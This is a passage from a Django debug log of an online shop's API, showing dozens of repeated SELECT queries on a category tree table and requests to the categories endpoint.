"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:56,992 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:56,996 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:57,000 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:57,004 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:57,010 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:57,014 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:57,018 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:57,022 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:57,026 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:57,031 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:57,037 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:57,041 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:57,045 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:57,050 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:57,054 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:57,060 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:57,064 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:57,068 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:57,072 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:57,077 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:57,084 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:57,088 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:57,092 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:57,096 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:57,100 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:57,104 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:57,109 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:57,113 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:57,117 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:57,122 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:57,126 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:11:00,501 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:11:00,509 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:11:00,512 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:11:00,515 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:11:00,519 utils 20136 140506432534272 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-16 07:11:00,519 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:11:00,528 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:11:00,529 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:11:00,537 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:11:00,540 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) [16/Dec/2019 07:11:00] "GET /api/v1/categories/5 HTTP/1.0" 200 1079 DEBUG 2019-12-16 07:11:00,543 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:11:00,547 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:11:00,549 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:11:00,551 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:11:00,554 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:11:00,558 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:11:00,563 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:11:00,567 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:11:00,570 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:11:00,574 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:11:00,577 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:11:00,581 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:11:00,583 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:11:00,586 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:11:00,588 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:11:00,590 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:11:00,594 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:11:00,599 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:11:00,603 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:11:00,606 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:11:00,610 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:11:00,613 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:11:00,618 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:11:00,622 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:11:00,625 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:11:00,627 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 